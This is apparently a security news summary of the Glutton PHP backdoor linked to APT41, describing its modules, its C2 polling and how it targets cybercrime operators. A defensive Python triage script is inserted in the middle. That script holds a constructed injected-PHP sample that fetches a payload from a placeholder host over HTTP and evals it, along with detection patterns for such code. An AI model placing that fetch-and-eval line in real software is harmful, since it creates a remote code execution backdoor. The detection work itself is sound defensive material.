New Glutton Malware Exploits PHP Frameworks in Cyber Attacks

Discover how vulnerabilities in popular PHP frameworks like Laravel and ThinkPHP can lead to significant security threats and learn how CloudGuard can protect against such modular malware attacks.

 

The newly discovered Glutton malware is a PHP-based backdoor used in cyberattacks across multiple countries and attributed to the Chinese group Winnti. It targets popular PHP frameworks such as Laravel and ThinkPHP, exploiting vulnerabilities to harvest sensitive data and inject malicious code. Despite its links to Winnti, Glutton lacks the group's typical stealth features: it communicates over unencrypted channels and relies on brute-force attacks for initial access. It is built as a modular framework capable of executing a range of commands and of turning cybercriminals' own tools against them. The malware's strategy includes exploiting cybercrime resources for further attacks, creating a recursive attack chain.

 

Key Facts

Risks: Malware, Web App/Website Vulnerability, Open Source, Zero-Day

Keywords: Glutton malware, PHP frameworks, Winnti, APT41, cybercrime market, Laravel, ThinkPHP, ELF backdoor

CVE: N/A

Affected: Laravel, ThinkPHP, Yii, Baota (BT), PHP frameworks, FastCGI Process Manager, ELF backdoor, cybercrime forums

 

Article Body

New Glutton Malware Targets PHP Frameworks

Cybersecurity researchers have identified a new malware threat named Glutton that exploits popular PHP frameworks. This PHP-based backdoor has been involved in cyberattacks affecting countries such as China, the United States, Cambodia, Pakistan, and South Africa. It has been linked to the Chinese nation-state group known as Winnti (APT41).

Targeting the Cybercrime Market

Glutton's creators have taken an unusual approach by targeting systems within the cybercrime market. Their goal is to turn the tools of cybercriminals against them, highlighting the adage "no honor among thieves."

Exploiting PHP Frameworks

The malware is designed to harvest sensitive information, drop an ELF backdoor component, and perform code injection against popular PHP frameworks, including Laravel, ThinkPHP, Yii, and Baota (BT). The ELF malware is nearly identical to a known Winnti tool called PWNLNX.

Shortcomings in Stealth

Despite its links to Winnti, Glutton lacks the stealth features typically associated with the group. It uses unencrypted HTTP for downloading payloads and lacks obfuscation, making it less covert than expected.

Modular Malware Framework

Glutton is a modular framework that infects PHP files and plants backdoors. It gains initial access through the exploitation of zero-day and N-day vulnerabilities and brute-force attacks. The malware also advertises on cybercrime forums, offering compromised enterprise hosts with backdoors for further attacks.

Key Modules

Backdoor Capabilities

The PHP backdoor supports 22 unique commands, enabling it to switch C2 connections, launch a shell, manage files, and execute arbitrary PHP code. It periodically polls the C2 server to fetch and run more PHP payloads, ensuring a stealthy footprint by executing code within PHP processes.
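The two behaviours described above, a framework's PHP files being modified to plant a backdoor and payloads being fetched from a C2 over plain HTTP and executed inside the PHP process, are what a defender can look for on a web host. The following is an added example written for this summary, not code from the original article or from the Glutton research: it hashes a tree of PHP sources against a known-good baseline and scans each file for generic fetch-and-eval indicators. The sample controller, the appended tail, the host name `payload.example.invalid` and the pattern names are all constructed for the example; the patterns are heuristics for in-process code loading, not signatures taken from the reporting.

```python
"""Triage of PHP source trees for injected, fetch-and-eval style backdoors.

Two checks: drift from a baseline hash manifest (the file was changed or added),
and a scan for code that pulls content over cleartext HTTP and evaluates it
inside the running PHP worker. Both are generic heuristics, assumed for this
example rather than taken from any published Glutton indicators.
"""
import hashlib
import re
from pathlib import Path

# Constructed sample PHP sources (not Glutton code): a clean Laravel-style
# controller and the same file with a fetch-and-eval tail appended.
CLEAN_PHP = """<?php
namespace App\\Http\\Controllers;

class HomeController extends Controller
{
    public function index()
    {
        return view('welcome');
    }
}
"""

INJECTED_PHP = CLEAN_PHP + """
// appended tail, constructed for this example; hostname is a placeholder
$u = "http://payload.example.invalid/stage.txt";
$p = @file_get_contents($u);
if ($p !== false) { eval($p); }
"""

# Heuristic indicators of a payload being loaded into the PHP process.
RISK_PATTERNS = {
    # code executed inside the running worker rather than loaded from a file on disk
    "eval_call": re.compile(r"\beval\s*\(", re.I),
    # payload address over cleartext HTTP, which the article notes Glutton uses
    "plain_http_url": re.compile(r"""['"]http://[^'"]+['"]""", re.I),
    # remote content read by a fetch primitive
    "remote_fetch": re.compile(r"\b(file_get_contents|curl_exec|fsockopen)\s*\(", re.I),
    # common layering used to hide payload text
    "encoded_payload": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
}


def sha256_text(src: str) -> str:
    return hashlib.sha256(src.encode("utf-8")).hexdigest()


def build_baseline(files: dict[str, str]) -> dict[str, str]:
    """Map each relative path to the SHA-256 of its known-good content."""
    return {path: sha256_text(src) for path, src in files.items()}


def scan_php_source(src: str) -> list[str]:
    """Return the names of the risk patterns present in one PHP source file."""
    return [name for name, rx in RISK_PATTERNS.items() if rx.search(src)]


def severity(findings: list[str], changed: bool) -> str:
    """A fetch-and-eval pair in a file that drifted from baseline is the strongest signal."""
    fetch_and_eval = "eval_call" in findings and (
        "plain_http_url" in findings or "remote_fetch" in findings
    )
    if fetch_and_eval and changed:
        return "high"
    if fetch_and_eval or (changed and findings):
        return "medium"
    if changed or findings:
        return "low"
    return "none"


def triage(files: dict[str, str], baseline: dict[str, str]) -> dict[str, dict]:
    """Compare PHP sources against the baseline and scan each for risk patterns."""
    report = {}
    for path, src in files.items():
        changed = baseline.get(path) != sha256_text(src)  # modified or newly added file
        findings = scan_php_source(src)
        report[path] = {
            "changed": changed,
            "findings": findings,
            "severity": severity(findings, changed),
        }
    return report


def load_tree(root: str) -> dict[str, str]:
    """Read every .php file under root, for running triage against a real deployment."""
    base = Path(root)
    return {
        str(p.relative_to(base)): p.read_text(encoding="utf-8", errors="replace")
        for p in base.rglob("*.php")
    }


if __name__ == "__main__":
    path = "app/Http/Controllers/HomeController.php"
    baseline = build_baseline({path: CLEAN_PHP})
    for file, result in triage({path: INJECTED_PHP}, baseline).items():
        print(file, result)
```

The baseline manifest should be built from a clean checkout or release artifact and stored off the web host, so that an attacker who can edit PHP files cannot also edit the hashes they are compared against. The pattern scan is a triage aid, not a verdict: legitimate code can call `file_get_contents` or decode base64, which is why the severity ladder treats baseline drift combined with a fetch-plus-eval pair as the finding worth escalating.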

Exploiting Cybercrime Resources

Glutton also uses the HackBrowserData tool to steal information from cybercrime operators, likely to inform future phishing or social engineering campaigns. This strategy of exploiting cybercrime resources creates a recursive attack chain.

Recent Developments

The discovery of Glutton follows an update on another APT41 malware, Mélofée, which has improved persistence mechanisms and stealth capabilities. Mélofée uses an RC4-encrypted kernel driver to mask traces of its activities and is used selectively against high-value targets.

 

Read More

https://thehackernews.com/2024/12/new-glutton-malware-exploits-popular.html?m=1